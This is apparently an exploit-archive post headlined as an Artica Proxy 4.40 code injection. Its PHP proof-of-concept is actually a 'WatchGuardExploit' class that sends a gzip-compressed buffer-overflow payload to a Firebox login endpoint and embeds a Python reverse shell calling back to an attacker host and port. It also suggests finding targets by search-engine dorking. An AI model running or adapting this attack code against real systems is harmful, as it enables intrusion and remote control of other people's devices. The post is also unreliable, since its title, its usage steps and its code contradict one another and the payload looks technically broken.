Headline
Artica Proxy 4.40 Code Injection
Artica Proxy version 4.40 suffers from a code injection vulnerability that provides a reverse shell.
=============================================================================================================================================| # Title : Artica Proxy appliance 4.40 Code Injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://artica-proxy.com/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 97 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass WatchGuardExploit { private $targetUri; private $lhost; private $lport; private $shell; public function __construct($targetUri, $lhost, $lport, $shell = "/usr/bin/python") { $this->targetUri = $targetUri; $this->lhost = $lhost; $this->lport = $lport; $this->shell = $shell; } public function sendRequest($method, $url, $data = null, $headers = []) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); if ($data) { curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } if (!empty($headers)) { curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); } $response = curl_exec($ch); curl_close($ch); return $response; } public function checkWatchGuardFirebox() { $url = $this->targetUri . '/auth/login'; $response = $this->sendRequest('GET', $url, null, ['from_page' => '/']); if ($response && strpos($response, 'Powered by WatchGuard Technologies') !== false && strpos($response, 'Firebox') !== false) { return true; } return false; } public function createBofPayload() { // Generate the buffer overflow payload with Python reverse shell code $randomStr = bin2hex(random_bytes(2)); // 4-character random alphanumeric $pyFilename = "/tmp/" . $randomStr . ".py"; $payload = "<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><" . str_repeat('A', 3181) . "MFA>"; $payload .= str_repeat('<BBBBMFA>', 3680); // Include a Python reverse shell command as the payload $payload .= 'import socket;from subprocess import call; from os import dup2;'; $payload .= 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'; $payload .= 's.connect(("' . $this->lhost . '",' . $this->lport . '));'; $payload .= 'dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);'; $payload .= 'call(["' . $this->shell . '","-i"]);'; $payload .= 'import os; os.remove("' . $pyFilename . '");'; return gzencode($payload); // gzip encoding } public function exploit() { if (!$this->checkWatchGuardFirebox()) { echo "Target is not vulnerable.\n"; return; } echo "Target is vulnerable. Sending exploit...\n"; $bofPayload = $this->createBofPayload(); // Send the buffer overflow payload $url = $this->targetUri . '/agent/login'; $this->sendRequest('POST', $url, $bofPayload, [ 'Accept-Encoding: gzip, deflate', 'Content-Encoding: gzip' ]); echo "Payload sent.\n"; }}// Example usage:$exploit = new WatchGuardExploit('https://target-ip:8080', 'attacker-ip', 4444);$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================